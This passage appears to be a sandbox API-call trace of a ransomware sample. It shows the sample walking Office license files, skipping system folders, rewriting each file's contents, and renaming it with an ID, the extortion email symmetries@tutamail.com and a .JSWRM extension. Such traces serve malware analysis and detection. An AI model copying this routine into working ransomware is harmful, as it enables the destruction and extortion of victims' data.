5 [0102.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0102.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.797] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0102.797] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0102.797] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0102.799] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.799] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0102.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.799] CloseHandle (hObject=0x45c) returned 1 [0102.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0102.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0102.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0102.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.800] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0102.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0102.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0102.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0102.801] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe34172f7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34172f7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe35485e3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1acc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="EXCELV~1.XRM")) returned 1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.801] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0102.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0102.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2413a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0102.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0102.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.802] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6860) returned 1 [0102.802] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ac0) returned 0x205850 [0102.802] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ac0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1ac0, lpOverlapped=0x0) returned 1 [0102.804] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.804] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1ac0, lpOverlapped=0x0) returned 1 [0102.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.804] CloseHandle (hObject=0x45c) returned 1 [0102.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0102.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0102.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0102.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0102.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0102.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.804] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0102.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.805] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec750afb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec750afb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec7e944d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d59, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="EX0778~1.XRM")) returned 1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.805] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.806] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.806] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0102.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0102.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0102.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0102.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0102.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.806] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11609) returned 1 [0102.806] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0102.807] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0102.810] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.810] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0102.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.810] CloseHandle (hObject=0x45c) returned 1 [0102.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0102.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0102.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0102.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.810] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0102.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0102.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.811] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3af1fe3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3af1fe3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3bd6df0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2581, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_KMS_Client-ul.xrm-ms", cAlternateFileName="EXCDB8~1.XRM")) returned 1 [0102.811] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0102.811] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0102.811] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0102.811] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0102.811] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0102.811] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned -1 [0102.812] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0102.812] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.812] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0102.812] lstrcmpiW (lpString1="ExcelVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned -1 [0102.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241358, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0102.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) 